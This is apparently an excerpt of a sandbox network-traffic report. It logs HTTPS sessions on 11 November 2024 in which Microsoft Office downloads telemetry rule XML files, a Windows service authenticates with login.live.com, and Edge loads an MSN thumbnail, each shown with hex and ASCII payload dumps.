109	192.168.2.5	49895	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: feb35d59-101e-0079-01d5-335913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093328Z-174f7845968cpnpfhC1EWR3afc00000004eg000000001dfk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:29 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.5	49894	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 30996da0-701e-006f-5cd5-33afc4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093328Z-174f7845968cdxdrhC1EWRg0en00000004n000000000876s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:29 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.5	49896	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:29 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:29 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 45a856d6-001e-0017-5bd5-330c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093329Z-174f78459685m244hC1EWRgp2c00000004n0000000002w90 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:29 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.5	49897	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:29 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:29 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 648756f6-901e-0067-0fd5-33b5cb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093329Z-174f78459685m244hC1EWRgp2c00000004f0000000009ztr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:29 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.5	49899	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:29 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:29 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 954b4d19-301e-0052-53d5-3365d6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093329Z-174f7845968ljs8phC1EWRe6en00000004n0000000003g83 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:29 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.5	49901	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:29 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:29 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 16af1629-301e-0033-6dd5-33fa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093329Z-174f78459685m244hC1EWRgp2c00000004q0000000000dta x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:29 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.5	49900	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:29 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:29 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 7cd1171a-e01e-0052-10d5-33d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093329Z-174f7845968nnm4mhC1EWR1rn400000004sg000000001sv1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:29 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	49898	40.126.31.69	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:29 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-11 09:33:29 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-11 09:33:30 UTC	653	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 11 Nov 2024 09:32:30 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.9 Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C527_BAY x-ms-request-id: 96430987-a8c3-43f1-9297-c4e0fa0409cf PPServer: PPV: 30 H: PH1PEPF0001B8F2 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 11 Nov 2024 09:33:29 GMT Connection: close Content-Length: 11391
2024-11-11 09:33:30 UTC	11391	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.5	49902	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:30 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:30 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 2302a2aa-d01e-0017-0cd5-33b035000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093330Z-174f7845968vqt9xhC1EWRgten00000004vg0000000021ap x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:30 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.5	49903	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:30 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:30 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 9a2be61a-a01e-0053-3cd5-338603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093330Z-174f7845968c2t8dhC1EWR8s2000000004c00000000098w4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:30 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	49907	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:30 UTC	506	OUT	GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:30 UTC	547	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t Last-Modified: Fri, 01 Nov 2024 15:43:48 GMT X-Source-Length: 822 X-Datacenter: eastus X-ActivityId: 8573cc25-f04b-4276-9d05-cb327393d12e Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 4096 Cache-Control: public, max-age=367820 Expires: Fri, 15 Nov 2024 15:43:50 GMT Date: Mon, 11 Nov 2024 09:33:30 GMT Connection: close
2024-11-11 09:33:30 UTC	4096	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: 